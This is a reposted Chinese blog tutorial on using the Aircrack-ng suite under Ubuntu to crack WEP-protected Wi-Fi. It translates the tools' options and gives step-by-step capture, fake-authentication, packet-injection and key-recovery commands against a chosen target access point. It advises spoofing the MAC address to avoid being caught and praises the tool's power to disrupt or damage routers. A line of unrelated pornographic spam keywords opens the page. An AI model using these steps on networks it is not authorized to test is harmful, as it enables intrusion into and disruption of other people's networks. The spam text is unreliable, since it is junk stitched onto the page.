国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP
Ubuntu下Aircrack-ng工具包的使用
Ubuntu下Aircrack-ng工具包的使用
安裝:$sudo apt-get install aircrack-ng

Aircrack-ng無線破解工具包有很多工具,用到的工具主要有以下幾個:

airmon-ng       處理網(wǎng)卡工作模式

airodump-ng     抓包

aircrack-ng     破解

aireplay-ng     發(fā)包,干擾


1) airmon-ng

啟動無線網(wǎng)卡進入 Monitor 模式,

useage: airmon-ng <start|stop|check> <interface> [channel]

<start|stop|check>:啟動,停止,檢測

<interface>:指定無線網(wǎng)卡

[channel]:監(jiān)聽頻道,現(xiàn)代大多數(shù)無線路由默認是 6,隨便掃描一下都是這個頻道,網(wǎng)管們應(yīng)該換換了


2) airodump-ng

抓包工具,我最喜歡用的,詳細用法如下:

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:

–ivs :僅將抓取信息保存為 .ivs

–write    <prefix> :保存為指定日文件名,我一般用這個,尤其是多個網(wǎng)絡(luò)時,指定了也好區(qū)分

–beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數(shù)據(jù)包的

Filter options:

–encrypt   <suite> : 使用密碼序列過濾 AP

–netmask <netmask> : 使用掩碼過濾 AP

–bssid     <bssid> : 使用 bssid 過濾 AP

-a : 過濾無關(guān)的客戶端

–help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文

3)aireplay-ng

搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質(zhì)的 AP 設(shè)備(小內(nèi)存的路由器可能會重啟,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸.

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : AP的 MAC

-d dmac:目標的 MAC

-s smac :來源的 MAC

-m len: 最小包長度

-n len: 最大包長度

-D: 禁用 AP 發(fā)現(xiàn)功能

Replay options:

-x nbpps : 每秒包數(shù)量

-p fctrl : 框架設(shè)定 (hex)

-a bssid : 設(shè)置AP的 mac

-c dmac: 設(shè)置目標的 MAC

-h smac: 設(shè)置來源的 mac

-g value : 改變環(huán)緩存大小 (默認8)

Fakeauth attack options:

-e essid : 設(shè)置目標 AP 的 SSID

-o npckts : 每秒爆破的包數(shù)量 (0 自動, 默認 1)

-q sec: 存活時間 秒

-y prga: 共享可信的 key流

–help : 顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全準確的翻譯,主要對付 那些不給出作者就引用的人,鄙視抄襲.

4)aircrack-ng

破解KEY,漫長的過程.漫不漫長取決于兩個方面: 一是網(wǎng)管的聰明程度(能否設(shè)置出復(fù)雜的密碼),二是電腦的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)

-e <essid> : 選擇 essid 為目標

-b <bssid> : 選擇 ap的 mac 為目標,就是破解識別的關(guān)鍵字

-q : 使用安靜模式,無數(shù)出模式

-C <macs> : 將所有的 AP 合并為一個虛擬的

–help: 顯示這個幫助


就WEP破解說明,步驟:


步驟:

1. 修改無線網(wǎng)卡狀態(tài):先 down 掉

2. 偽造無線網(wǎng)卡的 MAC 地址:安全起見,減少被抓到的可能

3. 修改網(wǎng)卡工作模式:進入Monitor狀態(tài),會產(chǎn)生一個虛擬的網(wǎng)卡

4. 修改無線網(wǎng)卡狀態(tài): up

5. 查看網(wǎng)絡(luò)狀態(tài),記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標

6. 監(jiān)聽抓包:生成 .cap 或 .ivs

7. 干擾無線網(wǎng)絡(luò):截取無線數(shù)據(jù)包,發(fā)送垃圾數(shù)據(jù)包,用來獲得更多的有效數(shù)據(jù)包

8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解

前面如何偽造網(wǎng)卡不在敘述,可參見這篇文章:
http://www.path8.net/tn/archives/40


具體步驟


1、首先確定是否有wlan0的無線網(wǎng)卡端口,ifconfig即可知道。若存在終端輸入 sudo airmon-ng start wlan0 啟動無線 網(wǎng)卡 的監(jiān)控模式。



2、在終端中輸入 sudo airodump -ng mon0 ,啟動監(jiān)控模式后無線端口是mon0(如果啟動多次會按數(shù)字累加), 看看有哪些采用wep 加密的AP在線,然后按 ctrl+c 退出,保留終端。




3、 另開一個終端,輸入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6為AP工作頻道,--bissid后面的AP's MAC 是要欲破解AP的MAC地址,-w后的wep的是抓下來的數(shù)據(jù)包DATA 保存的文件名(可以隨便取名),然后回車開始抓包。


(后來補上去的一張圖,所以時間不對:))

4、再另開一個終端,輸入 sudo aireplay-ng -1 0 -e ESSID -a AP's MAC -h My MAC mon0 與AP建立虛擬連接 (-h后面跟著的My MAC 是自己的無線網(wǎng)卡的MAC地址)


 這里以之前探測到的ESSID為P2P的為例。

5、建立虛擬連接成功后,輸入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 進行注入,現(xiàn)在步驟3中數(shù)據(jù)包應(yīng)該不斷增長。



6、收集有5000個以上的DATA之后,另開一個終端,輸入 sudo aircrack-ng wep*.cap 進行解密 (如果沒算出來的話,繼續(xù)等,Ubuntu aircrack-ng會在DATA每增加多5000個之后就自動再運行 ,直到算出密碼為至)


7、破解出密碼后在終端中輸入 sudo airmon-ng stop mon0 關(guān)閉監(jiān)控模式,不然無線網(wǎng)卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關(guān)閉終端都是不行的,除非重新啟動電腦。



8、如果沒有出現(xiàn)意外,你應(yīng)該會很高興的看到KEY FOUND!
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊舉報
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
openwrt wifi密碼
WIFI安全現(xiàn)狀
偽造AP獲取WiFi密碼
9.2 使用Aircrack
Aircrack
aircrack
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服